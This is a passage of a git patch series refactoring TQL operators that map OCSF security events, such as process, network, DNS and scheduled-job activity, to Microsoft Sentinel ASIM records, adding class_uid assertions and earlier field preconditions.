asim.EventResult = "Success" if ocsf.http_response.code < 400 else "Failure" } -assert asim.Url != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} +assert asim.Url != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: ocsf.class_uid, class_name: ocsf.class_name, type_uid: ocsf.type_uid, type_name: ocsf.type_name, name: @name} -this = {...asim, AdditionalFields: _ocsf} +this = {...asim, AdditionalFields: ocsf} diff --git a/microsoft/operators/asim/ocsf/network_activity.tql b/microsoft/operators/asim/ocsf/network_activity.tql index aab0a54..86c1c73 100644 --- a/microsoft/operators/asim/ocsf/network_activity.tql +++ b/microsoft/operators/asim/ocsf/network_activity.tql @@ -8,16 +8,16 @@ microsoft::asim::ocsf::helpers::common asim.EventSchema = "NetworkSession" asim.EventSchemaVersion = "0.2.7" asim.EventType = "NetworkSession" -asim.EventType = "Flow" if activity_name == "Traffic" else asim.EventType -asim.SrcIpAddr = src_endpoint?.ip? -asim.SrcHostname = src_endpoint?.hostname? -asim.SrcPortNumber = src_endpoint?.port? -asim.DstIpAddr = dst_endpoint?.ip? -asim.DstHostname = dst_endpoint?.hostname? -asim.DstPortNumber = dst_endpoint?.port? -asim.SrcBytes = traffic?.bytes_out? -asim.DstBytes = traffic?.bytes_in? -match disposition? { +asim.EventType = "Flow" if ocsf.activity_name == "Traffic" else asim.EventType +asim.SrcIpAddr = ocsf.src_endpoint?.ip? +asim.SrcHostname = ocsf.src_endpoint?.hostname? +asim.SrcPortNumber = ocsf.src_endpoint?.port? +asim.DstIpAddr = ocsf.dst_endpoint?.ip? +asim.DstHostname = ocsf.dst_endpoint?.hostname? +asim.DstPortNumber = ocsf.dst_endpoint?.port? +asim.SrcBytes = ocsf.traffic?.bytes_out? +asim.DstBytes = ocsf.traffic?.bytes_in? +match ocsf.disposition? { "Allowed" => { asim.DvcAction = "Allow" asim.EventResult = "Success" @@ -30,4 +30,4 @@ match disposition? { _ => {} } -this = {...asim, AdditionalFields: _ocsf} +this = {...asim, AdditionalFields: ocsf} diff --git a/microsoft/operators/asim/ocsf/process_activity.tql b/microsoft/operators/asim/ocsf/process_activity.tql index 4601260..4fbe522 100644 --- a/microsoft/operators/asim/ocsf/process_activity.tql +++ b/microsoft/operators/asim/ocsf/process_activity.tql @@ -7,34 +7,34 @@ microsoft::asim::ocsf::helpers::common @name = "asim.process_event" asim.EventSchema = "ProcessEvent" asim.EventSchemaVersion = "0.1.4" -match activity_name { +match ocsf.activity_name { "Launch" => { asim.EventType = "ProcessCreated" } "Terminate" => { asim.EventType = "ProcessTerminated" } _ => { assert false, message={ reason: "unsupported OCSF to ASIM mapping", - class_uid: class_uid?, - class_name: class_name?, - type_uid: type_uid?, - type_name: type_name?, + class_uid: ocsf.class_uid?, + class_name: ocsf.class_name?, + type_uid: ocsf.type_uid?, + type_name: ocsf.type_name?, name: @name, } } } -asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? -if actor?.user?.domain? != null and actor?.user?.name? != null { - asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}" +asim.ActorUsername = ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? else ocsf.actor?.user?.uid? +if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { + asim.ActorUsername = f"{ocsf.actor.user.domain}\\{ocsf.actor.user.name}" asim.ActorUsernameType = "Windows" } -asim.ActorUserId = actor?.user?.uid? +asim.ActorUserId = ocsf.actor?.user?.uid? asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null -asim.ActingProcessId = actor?.process?.pid?.string() else process?.parent_process?.pid?.string() else process?.pid?.string() -asim.ParentProcessId = actor?.process?.parent_process?.pid?.string() -asim.TargetProcessId = process?.pid?.string() -asim.TargetProcessName = process?.name? else process?.file?.name? else process?.path?.split("\\")[-1] -asim.TargetProcessCommandLine = process?.cmd_line? -asim.TargetUserId = user?.uid? +asim.ActingProcessId = ocsf.actor?.process?.pid?.string() else ocsf.process?.parent_process?.pid?.string() else ocsf.process?.pid?.string() +asim.ParentProcessId = ocsf.actor?.process?.parent_process?.pid?.string() +asim.TargetProcessId = ocsf.process?.pid?.string() +asim.TargetProcessName = ocsf.process?.name? else ocsf.process?.file?.name? else ocsf.process?.path?.split("\\")[-1] +asim.TargetProcessCommandLine = ocsf.process?.cmd_line? +asim.TargetUserId = ocsf.user?.uid? assert asim.ActorUsername != null and asim.ActingProcessId != null and asim.TargetProcessId != null and asim.TargetProcessName != null and asim.TargetProcessCommandLine != null, - message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} + message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: ocsf.class_uid, class_name: ocsf.class_name, type_uid: ocsf.type_uid, type_name: ocsf.type_name, name: @name} -this = {...asim, AdditionalFields: _ocsf} +this = {...asim, AdditionalFields: ocsf} diff --git a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql index 874cf5f..ae4a255 100644 --- a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql +++ b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql @@ -8,7 +8,7 @@ microsoft::asim::ocsf::helpers::common asim.EventSchema = "AuditEvent" asim.EventSchemaVersion = "0.1.2" asim.EventType = "Other" -match activity_name { +match ocsf.activity_name { "Create" => { asim.EventType = "Create" } "Read" => { asim.EventType = "Read" } "Update" | "Set" => { asim.EventType = "Set" } @@ -22,19 +22,19 @@ match activity_name { "Stop" => { asim.EventType = "Stop" } _ => {} } -asim.Operation = activity_name? else type_name? else asim.EventType -asim.Object = job?.name? else log_name? else metadata?.log_name? else entity?.name? else entity?.uid? else win_service?.name? else win_service?.service_file?.path? -assert asim.Object != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} +asim.Operation = ocsf.activity_name? else ocsf.type_name? else asim.EventType +asim.Object = ocsf.job?.name? else ocsf.log_name? else ocsf.metadata?.log_name? else ocsf.entity?.name? else ocsf.entity?.uid? else ocsf.win_service?.name? else ocsf.win_service?.service_file?.path? +assert asim.Object != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: ocsf.class_uid, class_name: ocsf.class_name, type_uid: ocsf.type_uid, type_name: ocsf.type_name, name: @name} asim.ObjectType = "Scheduled Task" -asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? else actor?.app_name? else actor?.app_uid? -if actor?.user?.domain? != null and actor?.user?.name? != null { - asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}" +asim.ActorUsername = ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? else ocsf.actor?.user?.uid? else ocsf.actor?.app_name? else ocsf.actor?.app_uid? +if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { + asim.ActorUsername = f"{ocsf.actor.user.domain}\\{ocsf.actor.user.name}" asim.ActorUsernameType = "Windows" } -asim.ActorUserId = actor?.user?.uid? +asim.ActorUserId = ocsf.actor?.user?.uid? asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null -asim.SrcIpAddr = src_endpoint?.ip? -asim.TargetHostname = dst_endpoint?.hostname? -asim.TargetIpAddr = dst_endpoint?.ip? +asim.SrcIpAddr = ocsf.src_endpoint?.ip? +asim.TargetHostname = ocsf.dst_endpoint?.hostname? +asim.TargetIpAddr = ocsf.dst_endpoint?.ip? -this = {...asim, AdditionalFields: _ocsf} +this = {...asim, AdditionalFields: ocsf} diff --git a/microsoft/operators/asim/ocsf/windows_service_activity.tql b/microsoft/operators/asim/ocsf/windows_service_activity.tql index a42553b..8ea03c0 100644 --- a/microsoft/operators/asim/ocsf/windows_service_activity.tql +++ b/microsoft/operators/asim/ocsf/windows_service_activity.tql @@ -8,7 +8,7 @@ microsoft::asim::ocsf::helpers::common asim.EventSchema = "AuditEvent" asim.EventSchemaVersion = "0.1.2" asim.EventType = "Other" -match activity_name { +match ocsf.activity_name { "Create" => { asim.EventType = "Create" } "Read" => { asim.EventType = "Read" } "Update" | "Set" => { asim.EventType = "Set" } @@ -22,19 +22,19 @@ match activity_name { "Stop" => { asim.EventType = "Stop" } _ => {} } -asim.Operation = activity_name? else type_name? else asim.EventType -asim.Object = job?.name? else log_name? else metadata?.log_name? else entity?.name? else entity?.uid? else win_service?.name? else win_service?.service_file?.path? -assert asim.Object != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} +asim.Operation = ocsf.activity_name? else ocsf.type_name? else asim.EventType +asim.Object = ocsf.job?.name? else ocsf.log_name? else ocsf.metadata?.log_name? else ocsf.entity?.name? else ocsf.entity?.uid? else ocsf.win_service?.name? else ocsf.win_service?.service_file?.path? +assert asim.Object != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: ocsf.class_uid, class_name: ocsf.class_name, type_uid: ocsf.type_uid, type_name: ocsf.type_name, name: @name} asim.ObjectType = "Service" -asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? else actor?.app_name? else actor?.app_uid? -if actor?.user?.domain? != null and actor?.user?.name? != null { - asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}" +asim.ActorUsername = ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? else ocsf.actor?.user?.uid? else ocsf.actor?.app_name? else ocsf.actor?.app_uid? +if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { + asim.ActorUsername = f"{ocsf.actor.user.domain}\\{ocsf.actor.user.name}" asim.ActorUsernameType = "Windows" } -asim.ActorUserId = actor?.user?.uid? +asim.ActorUserId = ocsf.actor?.user?.uid? asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null -asim.SrcIpAddr = src_endpoint?.ip? -asim.TargetHostname = dst_endpoint?.hostname? -asim.TargetIpAddr = dst_endpoint?.ip? +asim.SrcIpAddr = ocsf.src_endpoint?.ip? +asim.TargetHostname = ocsf.dst_endpoint?.hostname? +asim.TargetIpAddr = ocsf.dst_endpoint?.ip? -this = {...asim, AdditionalFields: _ocsf} +this = {...asim, AdditionalFields: ocsf} From 2230a7c51cd9250fb73fa63237f11ac4c22f9b27 Mon Sep 17 00:00:00 2001 From: Matthias Vallentin Date: Mon, 8 Jun 2026 17:15:28 +0200 Subject: [PATCH 09/27] Streamline Microsoft mapper wrappers Run the generic ASIM wrapper through OCSF normalization only when class_uid is absent, then always dispatch via the ASIM OCSF mapper with raw passthrough. Initialize source and target namespaces in one assignment for Graph and Windows OCSF wrappers. Assisted-by: GPT-5 Codex (Superconductor) --- microsoft/operators/asim/map.tql | 7 +++---- microsoft/operators/asim/ocsf/map.tql | 10 ++++++++++ microsoft/operators/graph/ocsf/map.tql | 3 +-- microsoft/operators/windows/ocsf/map.tql | 4 +--- 4 files changed, 15 insertions(+), 9 deletions(-) diff --git a/microsoft/operators/asim/map.tql b/microsoft/operators/asim/map.tql index 81b6bb2..42fafb5 100644 --- a/microsoft/operators/asim/map.tql +++ b/microsoft/operators/asim/map.tql @@ -7,11 +7,10 @@ args: default: null --- -if class_uid? != null { - microsoft::asim::ocsf::map -} else { +if class_uid? == null { microsoft::ocsf::map raw=$raw ocsf::derive ocsf::cast - microsoft::asim::ocsf::map } + +microsoft::asim::ocsf::map $raw diff --git a/microsoft/operators/asim/ocsf/map.tql b/microsoft/operators/asim/ocsf/map.tql index f9025c4..f9ffffb 100644 --- a/microsoft/operators/asim/ocsf/map.tql +++ b/microsoft/operators/asim/ocsf/map.tql @@ -1,7 +1,17 @@ --- description: Maps validated OCSF 1.8 events to Microsoft Sentinel ASIM. +args: + positional: + - name: raw + description: Raw Microsoft event to preserve in OCSF `raw_data` before ASIM mapping. + default: null --- +if $raw != null { + raw_data = $raw + raw_data_size = $raw.length_bytes() +} + match class_uid { 2003 => { microsoft::asim::ocsf::compliance_finding diff --git a/microsoft/operators/graph/ocsf/map.tql b/microsoft/operators/graph/ocsf/map.tql index 7838e67..84872d0 100644 --- a/microsoft/operators/graph/ocsf/map.tql +++ b/microsoft/operators/graph/ocsf/map.tql @@ -7,8 +7,7 @@ args: default: null --- -this = {graph: this} -ocsf = {} +this = {graph: this, ocsf: {}} if $raw != null { ocsf.raw_data = $raw diff --git a/microsoft/operators/windows/ocsf/map.tql b/microsoft/operators/windows/ocsf/map.tql index ac8837f..33c3f9b 100644 --- a/microsoft/operators/windows/ocsf/map.tql +++ b/microsoft/operators/windows/ocsf/map.tql @@ -7,9 +7,7 @@ args: default: null --- -windows = this - -ocsf = {} +this = {windows: this, ocsf: {}} if $raw != null { ocsf.raw_data = $raw ocsf.raw_data_size = $raw.length_bytes() From 587c03f379300c610497fe1f12129a92f3c3f6d4 Mon Sep 17 00:00:00 2001 From: Matthias Vallentin Date: Mon, 8 Jun 2026 17:17:38 +0200 Subject: [PATCH 10/27] Assert ASIM OCSF mapper inputs Add class_uid assertions to every ASIM OCSF leaf mapper so direct calls fail before common mapper setup when the source OCSF class is wrong. Assisted-by: GPT-5 Codex (Superconductor) --- microsoft/operators/asim/ocsf/authentication.tql | 2 ++ microsoft/operators/asim/ocsf/authorize_session.tql | 2 ++ microsoft/operators/asim/ocsf/compliance_finding.tql | 2 ++ microsoft/operators/asim/ocsf/detection_finding.tql | 2 ++ microsoft/operators/asim/ocsf/dhcp_activity.tql | 2 ++ microsoft/operators/asim/ocsf/dns_activity.tql | 2 ++ microsoft/operators/asim/ocsf/entity_management.tql | 2 ++ microsoft/operators/asim/ocsf/event_log_activity.tql | 2 ++ microsoft/operators/asim/ocsf/file_system_activity.tql | 2 ++ microsoft/operators/asim/ocsf/group_management.tql | 2 ++ microsoft/operators/asim/ocsf/http_activity.tql | 2 ++ microsoft/operators/asim/ocsf/network_activity.tql | 2 ++ microsoft/operators/asim/ocsf/process_activity.tql | 2 ++ microsoft/operators/asim/ocsf/scheduled_job_activity.tql | 2 ++ microsoft/operators/asim/ocsf/windows_service_activity.tql | 2 ++ 15 files changed, 30 insertions(+) diff --git a/microsoft/operators/asim/ocsf/authentication.tql b/microsoft/operators/asim/ocsf/authentication.tql index 40db64a..4a0e603 100644 --- a/microsoft/operators/asim/ocsf/authentication.tql +++ b/microsoft/operators/asim/ocsf/authentication.tql @@ -2,6 +2,8 @@ description: Maps OCSF Authentication events to Microsoft Sentinel ASIM Authentication events. --- +assert class_uid == 3002 + microsoft::asim::ocsf::helpers::common @name = "asim.authentication" diff --git a/microsoft/operators/asim/ocsf/authorize_session.tql b/microsoft/operators/asim/ocsf/authorize_session.tql index 574f6d5..d7eba65 100644 --- a/microsoft/operators/asim/ocsf/authorize_session.tql +++ b/microsoft/operators/asim/ocsf/authorize_session.tql @@ -2,6 +2,8 @@ description: Maps OCSF Authorize Session events to Microsoft Sentinel ASIM Authentication events. --- +assert class_uid == 3003 + microsoft::asim::ocsf::helpers::common @name = "asim.authentication" diff --git a/microsoft/operators/asim/ocsf/compliance_finding.tql b/microsoft/operators/asim/ocsf/compliance_finding.tql index d02093d..6bab6c7 100644 --- a/microsoft/operators/asim/ocsf/compliance_finding.tql +++ b/microsoft/operators/asim/ocsf/compliance_finding.tql @@ -2,6 +2,8 @@ description: Maps OCSF Compliance Finding events to Microsoft Sentinel ASIM AlertEvent records. --- +assert class_uid == 2003 + microsoft::asim::ocsf::helpers::common @name = "asim.alert_event" diff --git a/microsoft/operators/asim/ocsf/detection_finding.tql b/microsoft/operators/asim/ocsf/detection_finding.tql index 795ee08..67be606 100644 --- a/microsoft/operators/asim/ocsf/detection_finding.tql +++ b/microsoft/operators/asim/ocsf/detection_finding.tql @@ -2,6 +2,8 @@ description: Maps OCSF Detection Finding events to Microsoft Sentinel ASIM AlertEvent records. --- +assert class_uid == 2004 + let $threat_categories = { adware: "Adware", cryptominer: "Cryptominor", diff --git a/microsoft/operators/asim/ocsf/dhcp_activity.tql b/microsoft/operators/asim/ocsf/dhcp_activity.tql index 1d6b638..a168f31 100644 --- a/microsoft/operators/asim/ocsf/dhcp_activity.tql +++ b/microsoft/operators/asim/ocsf/dhcp_activity.tql @@ -2,6 +2,8 @@ description: Maps OCSF DHCP Activity events to Microsoft Sentinel ASIM DhcpEvent records. --- +assert class_uid == 4004 + microsoft::asim::ocsf::helpers::common @name = "asim.dhcp_event" diff --git a/microsoft/operators/asim/ocsf/dns_activity.tql b/microsoft/operators/asim/ocsf/dns_activity.tql index 8c71da7..50731b3 100644 --- a/microsoft/operators/asim/ocsf/dns_activity.tql +++ b/microsoft/operators/asim/ocsf/dns_activity.tql @@ -2,6 +2,8 @@ description: Maps OCSF DNS Activity events to Microsoft Sentinel ASIM Dns records. --- +assert class_uid == 4003 + microsoft::asim::ocsf::helpers::common @name = "asim.dns" diff --git a/microsoft/operators/asim/ocsf/entity_management.tql b/microsoft/operators/asim/ocsf/entity_management.tql index 02cf88f..4e12fb3 100644 --- a/microsoft/operators/asim/ocsf/entity_management.tql +++ b/microsoft/operators/asim/ocsf/entity_management.tql @@ -2,6 +2,8 @@ description: Maps OCSF Entity Management events to Microsoft Sentinel ASIM AuditEvent records. --- +assert class_uid == 3004 + microsoft::asim::ocsf::helpers::common @name = "asim.audit_event" diff --git a/microsoft/operators/asim/ocsf/event_log_activity.tql b/microsoft/operators/asim/ocsf/event_log_activity.tql index d2b2c71..bace4cc 100644 --- a/microsoft/operators/asim/ocsf/event_log_activity.tql +++ b/microsoft/operators/asim/ocsf/event_log_activity.tql @@ -2,6 +2,8 @@ description: Maps OCSF Event Log Activity events to Microsoft Sentinel ASIM AuditEvent records. --- +assert class_uid == 1008 + microsoft::asim::ocsf::helpers::common @name = "asim.audit_event" diff --git a/microsoft/operators/asim/ocsf/file_system_activity.tql b/microsoft/operators/asim/ocsf/file_system_activity.tql index 15bb103..ce7a181 100644 --- a/microsoft/operators/asim/ocsf/file_system_activity.tql +++ b/microsoft/operators/asim/ocsf/file_system_activity.tql @@ -2,6 +2,8 @@ description: Maps OCSF File System Activity events to Microsoft Sentinel ASIM FileEvent records. --- +assert class_uid == 1001 + microsoft::asim::ocsf::helpers::common @name = "asim.file_event" diff --git a/microsoft/operators/asim/ocsf/group_management.tql b/microsoft/operators/asim/ocsf/group_management.tql index b978972..3d1dc72 100644 --- a/microsoft/operators/asim/ocsf/group_management.tql +++ b/microsoft/operators/asim/ocsf/group_management.tql @@ -2,6 +2,8 @@ description: Maps OCSF Group Management events to Microsoft Sentinel ASIM UserManagement events. --- +assert class_uid == 3006 + microsoft::asim::ocsf::helpers::common @name = "asim.user_management" diff --git a/microsoft/operators/asim/ocsf/http_activity.tql b/microsoft/operators/asim/ocsf/http_activity.tql index 8566279..8322abb 100644 --- a/microsoft/operators/asim/ocsf/http_activity.tql +++ b/microsoft/operators/asim/ocsf/http_activity.tql @@ -2,6 +2,8 @@ description: Maps OCSF HTTP Activity events to Microsoft Sentinel ASIM WebSession records. --- +assert class_uid == 4002 + microsoft::asim::ocsf::helpers::common @name = "asim.web_session" diff --git a/microsoft/operators/asim/ocsf/network_activity.tql b/microsoft/operators/asim/ocsf/network_activity.tql index 86c1c73..ce8042a 100644 --- a/microsoft/operators/asim/ocsf/network_activity.tql +++ b/microsoft/operators/asim/ocsf/network_activity.tql @@ -2,6 +2,8 @@ description: Maps OCSF Network Activity events to Microsoft Sentinel ASIM NetworkSession records. --- +assert class_uid == 4001 + microsoft::asim::ocsf::helpers::common @name = "asim.network_session" diff --git a/microsoft/operators/asim/ocsf/process_activity.tql b/microsoft/operators/asim/ocsf/process_activity.tql index 4fbe522..e537148 100644 --- a/microsoft/operators/asim/ocsf/process_activity.tql +++ b/microsoft/operators/asim/ocsf/process_activity.tql @@ -2,6 +2,8 @@ description: Maps OCSF Process Activity events to Microsoft Sentinel ASIM ProcessEvent records. --- +assert class_uid == 1007 + microsoft::asim::ocsf::helpers::common @name = "asim.process_event" diff --git a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql index ae4a255..d41fa99 100644 --- a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql +++ b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql @@ -2,6 +2,8 @@ description: Maps OCSF Scheduled Job Activity events to Microsoft Sentinel ASIM AuditEvent records. --- +assert class_uid == 1006 + microsoft::asim::ocsf::helpers::common @name = "asim.audit_event" diff --git a/microsoft/operators/asim/ocsf/windows_service_activity.tql b/microsoft/operators/asim/ocsf/windows_service_activity.tql index 8ea03c0..fc46d69 100644 --- a/microsoft/operators/asim/ocsf/windows_service_activity.tql +++ b/microsoft/operators/asim/ocsf/windows_service_activity.tql @@ -2,6 +2,8 @@ description: Maps OCSF Windows Service Activity events to Microsoft Sentinel ASIM AuditEvent records. --- +assert class_uid == 201004 + microsoft::asim::ocsf::helpers::common @name = "asim.audit_event" From b2272a523b3d478b5f23f80f6026081b2ddfa706 Mon Sep 17 00:00:00 2001 From: Matthias Vallentin Date: Mon, 8 Jun 2026 17:21:10 +0200 Subject: [PATCH 11/27] Move ASIM OCSF preconditions up Assert required source OCSF fields before common mapper setup instead of checking derived ASIM fields after mapping work has already run. Assisted-by: GPT-5 Codex (Superconductor) --- .../operators/asim/ocsf/compliance_finding.tql | 3 ++- .../operators/asim/ocsf/detection_finding.tql | 3 ++- microsoft/operators/asim/ocsf/dhcp_activity.tql | 4 ++-- microsoft/operators/asim/ocsf/dns_activity.tql | 3 ++- .../operators/asim/ocsf/entity_management.tql | 3 ++- .../operators/asim/ocsf/event_log_activity.tql | 3 ++- .../asim/ocsf/file_system_activity.tql | 4 ++-- .../operators/asim/ocsf/group_management.tql | 3 ++- microsoft/operators/asim/ocsf/http_activity.tql | 3 ++- .../operators/asim/ocsf/process_activity.tql | 17 +++++------------ .../asim/ocsf/scheduled_job_activity.tql | 3 ++- .../asim/ocsf/windows_service_activity.tql | 3 ++- 12 files changed, 27 insertions(+), 25 deletions(-) diff --git a/microsoft/operators/asim/ocsf/compliance_finding.tql b/microsoft/operators/asim/ocsf/compliance_finding.tql index 6bab6c7..4384cff 100644 --- a/microsoft/operators/asim/ocsf/compliance_finding.tql +++ b/microsoft/operators/asim/ocsf/compliance_finding.tql @@ -3,6 +3,8 @@ description: Maps OCSF Compliance Finding events to Microsoft Sentinel ASIM Aler --- assert class_uid == 2003 +assert (finding_info?.uid? else metadata?.original_event_uid?) != null, + message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name?, type_uid: type_uid?, type_name: type_name?, name: "asim.alert_event"} microsoft::asim::ocsf::helpers::common @@ -11,7 +13,6 @@ asim.EventSchema = "AlertEvent" asim.EventSchemaVersion = "0.1" asim.EventType = "Alert" asim.EventUid = ocsf.finding_info?.uid? else ocsf.metadata?.original_event_uid? -assert asim.EventUid != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: ocsf.class_uid, class_name: ocsf.class_name, type_uid: ocsf.type_uid, type_name: ocsf.type_name, name: @name} asim.AlertName = ocsf.finding_info?.title? else ocsf.message? asim.EventReportUrl = ocsf.finding_info?.url? else null diff --git a/microsoft/operators/asim/ocsf/detection_finding.tql b/microsoft/operators/asim/ocsf/detection_finding.tql index 67be606..54ae6af 100644 --- a/microsoft/operators/asim/ocsf/detection_finding.tql +++ b/microsoft/operators/asim/ocsf/detection_finding.tql @@ -3,6 +3,8 @@ description: Maps OCSF Detection Finding events to Microsoft Sentinel ASIM Alert --- assert class_uid == 2004 +assert (finding_info?.uid? else metadata?.original_event_uid?) != null, + message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name?, type_uid: type_uid?, type_name: type_name?, name: "asim.alert_event"} let $threat_categories = { adware: "Adware", @@ -26,7 +28,6 @@ asim.EventSchema = "AlertEvent" asim.EventSchemaVersion = "0.1" asim.EventType = "Alert" asim.EventUid = ocsf.finding_info?.uid? else ocsf.metadata?.original_event_uid? -assert asim.EventUid != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: ocsf.class_uid, class_name: ocsf.class_name, type_uid: ocsf.type_uid, type_name: ocsf.type_name, name: @name} asim.AlertName = ocsf.finding_info?.title? else ocsf.message? asim.EventReportUrl = ocsf.finding_info?.url? else null diff --git a/microsoft/operators/asim/ocsf/dhcp_activity.tql b/microsoft/operators/asim/ocsf/dhcp_activity.tql index a168f31..e9a329b 100644 --- a/microsoft/operators/asim/ocsf/dhcp_activity.tql +++ b/microsoft/operators/asim/ocsf/dhcp_activity.tql @@ -3,6 +3,8 @@ description: Maps OCSF DHCP Activity events to Microsoft Sentinel ASIM DhcpEvent --- assert class_uid == 4004 +assert src_endpoint?.ip? != null and src_endpoint?.mac? != null, + message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name?, type_uid: type_uid?, type_name: type_name?, name: "asim.dhcp_event"} microsoft::asim::ocsf::helpers::common @@ -18,7 +20,5 @@ match ocsf.activity_name { asim.SrcHostname = ocsf.src_endpoint?.hostname? else ocsf.src_endpoint?.ip?.string() asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.SrcMacAddr = ocsf.src_endpoint?.mac? -assert asim.SrcHostname != null and asim.SrcIpAddr != null and asim.SrcMacAddr != null, - message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: ocsf.class_uid, class_name: ocsf.class_name, type_uid: ocsf.type_uid, type_name: ocsf.type_name, name: @name} this = {...asim, AdditionalFields: ocsf} diff --git a/microsoft/operators/asim/ocsf/dns_activity.tql b/microsoft/operators/asim/ocsf/dns_activity.tql index 50731b3..0b2d829 100644 --- a/microsoft/operators/asim/ocsf/dns_activity.tql +++ b/microsoft/operators/asim/ocsf/dns_activity.tql @@ -3,6 +3,8 @@ description: Maps OCSF DNS Activity events to Microsoft Sentinel ASIM Dns record --- assert class_uid == 4003 +assert query?.hostname? != null, + message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name?, type_uid: type_uid?, type_name: type_name?, name: "asim.dns"} microsoft::asim::ocsf::helpers::common @@ -23,6 +25,5 @@ asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.SrcHostname = ocsf.src_endpoint?.hostname? asim.DstIpAddr = ocsf.dst_endpoint?.ip? asim.DstHostname = ocsf.dst_endpoint?.hostname? -assert asim.DnsQuery != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: ocsf.class_uid, class_name: ocsf.class_name, type_uid: ocsf.type_uid, type_name: ocsf.type_name, name: @name} this = {...asim, AdditionalFields: ocsf} diff --git a/microsoft/operators/asim/ocsf/entity_management.tql b/microsoft/operators/asim/ocsf/entity_management.tql index 4e12fb3..c985b45 100644 --- a/microsoft/operators/asim/ocsf/entity_management.tql +++ b/microsoft/operators/asim/ocsf/entity_management.tql @@ -3,6 +3,8 @@ description: Maps OCSF Entity Management events to Microsoft Sentinel ASIM Audit --- assert class_uid == 3004 +assert (job?.name? else log_name? else metadata?.log_name? else entity?.name? else entity?.uid? else win_service?.name? else win_service?.service_file?.path?) != null, + message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name?, type_uid: type_uid?, type_name: type_name?, name: "asim.audit_event"} microsoft::asim::ocsf::helpers::common @@ -26,7 +28,6 @@ match ocsf.activity_name { } asim.Operation = ocsf.activity_name? else ocsf.type_name? else asim.EventType asim.Object = ocsf.job?.name? else ocsf.log_name? else ocsf.metadata?.log_name? else ocsf.entity?.name? else ocsf.entity?.uid? else ocsf.win_service?.name? else ocsf.win_service?.service_file?.path? -assert asim.Object != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: ocsf.class_uid, class_name: ocsf.class_name, type_uid: ocsf.type_uid, type_name: ocsf.type_name, name: @name} asim.ObjectType = "Directory Service Object" asim.ActorUsername = ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? else ocsf.actor?.user?.uid? else ocsf.actor?.app_name? else ocsf.actor?.app_uid? if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { diff --git a/microsoft/operators/asim/ocsf/event_log_activity.tql b/microsoft/operators/asim/ocsf/event_log_activity.tql index bace4cc..01658bb 100644 --- a/microsoft/operators/asim/ocsf/event_log_activity.tql +++ b/microsoft/operators/asim/ocsf/event_log_activity.tql @@ -3,6 +3,8 @@ description: Maps OCSF Event Log Activity events to Microsoft Sentinel ASIM Audi --- assert class_uid == 1008 +assert (job?.name? else log_name? else metadata?.log_name? else entity?.name? else entity?.uid? else win_service?.name? else win_service?.service_file?.path?) != null, + message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name?, type_uid: type_uid?, type_name: type_name?, name: "asim.audit_event"} microsoft::asim::ocsf::helpers::common @@ -26,7 +28,6 @@ match ocsf.activity_name { } asim.Operation = ocsf.activity_name? else ocsf.type_name? else asim.EventType asim.Object = ocsf.job?.name? else ocsf.log_name? else ocsf.metadata?.log_name? else ocsf.entity?.name? else ocsf.entity?.uid? else ocsf.win_service?.name? else ocsf.win_service?.service_file?.path? -assert asim.Object != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: ocsf.class_uid, class_name: ocsf.class_name, type_uid: ocsf.type_uid, type_name: ocsf.type_name, name: @name} asim.ObjectType = "Event Log" asim.ActorUsername = ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? else ocsf.actor?.user?.uid? else ocsf.actor?.app_name? else ocsf.actor?.app_uid? if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { diff --git 